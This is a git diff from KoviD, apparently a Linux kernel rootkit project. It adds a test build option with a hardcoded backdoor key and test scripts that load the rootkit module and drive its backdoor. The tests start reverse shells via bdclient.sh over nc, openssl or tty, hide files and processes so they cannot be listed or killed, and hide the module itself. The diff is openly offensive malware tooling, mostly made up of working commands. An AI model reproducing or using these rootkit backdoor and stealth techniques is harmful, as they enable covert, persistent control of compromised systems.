carloslack · carloslack · Dec 1, 2024 · Nov 25, 2024 · Nov 25, 2024 · Nov 25, 2024
diff --git a/Makefile b/Makefile
@@ -11,8 +11,15 @@ AS=$(shell which as)
 CTAGS=$(shell which ctags)
 JOURNALCTL := $(shell which journalctl)
 UUIDGEN := $(shell uuidgen)
+
+# For tests, use hardcoded keys.
+ifndef TEST_ENV
 BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
 UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
+else
+BDKEY=0x7d3b1cb572f16425
+UNHIDEKEY=0x2
+endif
 
 # PROCNAME, /proc/<name> interface.
 COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \

diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
@@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../
 If you want to build and run native tests only, just use:
 
 ```
-$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
+$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1  
 ```
 
 ## Building for Linux version other than native
@@ -109,9 +109,10 @@ $ make
     To simply run those (but make sure you followed the instructions for setting the enviroment described below):
 
     ```
+    $ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1
     # From root directory of the project
     $ mkdir build && cd build
-    $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
+    $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
     # Please run the command with only one Thread!
     $ make check-kovid -j1
     ```
@@ -187,7 +188,7 @@ Usual set of commands to be used:
 $ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD
 $ git submodule update --init test/test-artefacts
 $ mkdir build && cd build
-$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid
+$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid
 ```
 
 ## Insall dependecies and set up enviroment
@@ -269,7 +270,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl
 
 ```
 $ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1
-$ make PROCNAME="myprocname" DEPLOY=1
+$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1
 $ make check-kovid
 ```
 
@@ -306,3 +307,7 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
 | tty backdoor                                       | Yes                            | native/tty-backdoor.test              |
 | backdoor echo -s                                   | Yes                            | native/nc-backdoor-echo-s.test        |
 | Hide/Unhide Module                                 | Yes                            | native/hide-unhide-module.test        |
+| backdoor + PID                                     | Yes                            | native/nc-backdoor-plus-pid.test      |
+| hide file                                          | Yes                            | native/hiden-file.test                |
+| hide file (2)                                      | Yes                            | native/hiden-file-in-all-dirs.test    |
+| unhide module                                      | Yes                            | native/hide-unhide-module.test        |
diff --git a/test/native/Inputs/Makefile b/test/native/Inputs/Makefile
@@ -0,0 +1,7 @@
+obj-m = hello.o
+
+all:
+	make -C  /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make --C  /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/test/native/Inputs/hello.c b/test/native/Inputs/hello.c
@@ -0,0 +1,24 @@
+#include <linux/module.h>
+#include <linux/kernel.h> 
+#include <linux/init.h>
+
+MODULE_LICENSE("GPL"); 
+
+MODULE_DESCRIPTION("A simple Hello world LKM!"); 
+
+MODULE_VERSION("0.1"); 
+
+static int __init hello_start(void) 
+{ 
+    printk(KERN_INFO "Loading hello module...\n"); 
+    printk(KERN_INFO "Hello world\n"); 
+    return 0; 
+}
+
+static void __exit hello_end(void) 
+{ 
+    printk(KERN_INFO "Goodbye!!!\n"); 
+} 
+
+module_init(hello_start); 
+module_exit(hello_end); 
diff --git a/test/native/Inputs/simple-test.c b/test/native/Inputs/simple-test.c
@@ -0,0 +1,6 @@
+int main()
+{
+	while(1);
+
+	return 0;
+}
diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test
@@ -1,4 +1,3 @@
-# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 
@@ -8,8 +7,10 @@
 sleep 10
 sudo insmod ../../../build/kovid.ko
 lsmod | grep kovid
-echo -h > /proc/myprocname
+kill -CONT 31337
+echo hide-lkm > /proc/myprocname
 lsmod | grep kovid
+echo unhide-lkm=2 > /proc/myprocname
 sudo rmmod kovid
 
 # CHECK: kovid

diff --git a/test/native/hiden-file-in-all-dirs.test b/test/native/hiden-file-in-all-dirs.test
@@ -0,0 +1,30 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+TEST_FILE="hidden_file.txt"
+
+# Create a file with the same name in another directory
+OTHER_DIR="/tmp/other_dir"
+mkdir -p "$OTHER_DIR"
+touch "$OTHER_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname
+
+# Check that files with the same name in other directories are also hidden
+ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory"
+
+# Cleanup
+rm -rf "$OTHER_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden in other directory
diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test
@@ -0,0 +1,29 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Create a test directory and file
+TEST_DIR="/tmp/test_hide_file"
+TEST_FILE="hidden_file.txt"
+mkdir -p "$TEST_DIR"
+touch "$TEST_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname
+
+# Verify that the file is hidden when listing the directory
+ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"
+
+# Cleanup
+rm -rf "$TEST_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden
diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test
@@ -8,18 +8,18 @@
 sudo dmesg -c
 sleep 10
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
-echo -s > /proc/myprocname
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
+echo list-hidden-tasks > /proc/myprocname
 sudo rmmod kovid
 sudo dmesg
 
 # CHECK: kv: using kprobe for kallsyms_lookup_name
 # CHECK: Waiting for event
 # CHECK: loaded
 # CHECK: Got event
-# CHECK: hide [{{.*}}] {{.*}}
-# CHECK: hide [{{.*}}] {{.*}}
-# CHECK: BD : dash
-# CHECK: BD : bash
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
 # CHECK: Got event
 # CHECK: unloaded
diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test
@@ -0,0 +1,36 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+
+# Start the reverse shell in the background, suppressing its output
+sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 &
+
+# Allow the reverse shell to initialize
+sleep 1
+
+# Send a signal to the "kill -CONT 31337" process as an additional check
+kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process"
+
+# Run the `a.out` executable in the background and capture its PID
+./Inputs/a.out &
+AOUT_PID=$!
+
+# Wait briefly to ensure the process has started
+sleep 1
+
+# Hide the process using the backdoor functionality
+echo hide-task-backdoor=$AOUT_PID > /proc/myprocname
+
+# Attempt to kill the hidden process and verify that it fails
+kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process"
+
+# Remove the module
+sudo rmmod kovid
+
+# CHECK: sh: can't kill pid 31337: No such process
+# CHECK: sh: can't kill pid {{.*}}: No such process
diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 
@@ -7,7 +8,7 @@
 sudo dmesg -c
 sleep 10
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 sudo dmesg
 

diff --git a/test/native/openssl-backdoor.test b/test/native/openssl-backdoor.test
@@ -6,7 +6,7 @@
 # RUN: FileCheck-18 --input-file=%t.log %s
 
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 
 # CHECK: ACCEPT

diff --git a/test/native/simple-insmod-hello-ko.test b/test/native/simple-insmod-hello-ko.test
@@ -0,0 +1,18 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+## Make sure you enter `test/native/Inputs` and run `make`
+## in order to build `hello.ko`.
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 2
+sudo insmod ../../../test/native/Inputs/hello.ko
+sudo rmmod hello
+sudo dmesg
+
+# CHECK: Loading hello module...
+# CHECK: Hello world
diff --git a/test/native/tty-backdoor.test b/test/native/tty-backdoor.test
@@ -8,7 +8,7 @@
 sudo dmesg -c
 sleep 20
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 sudo dmesg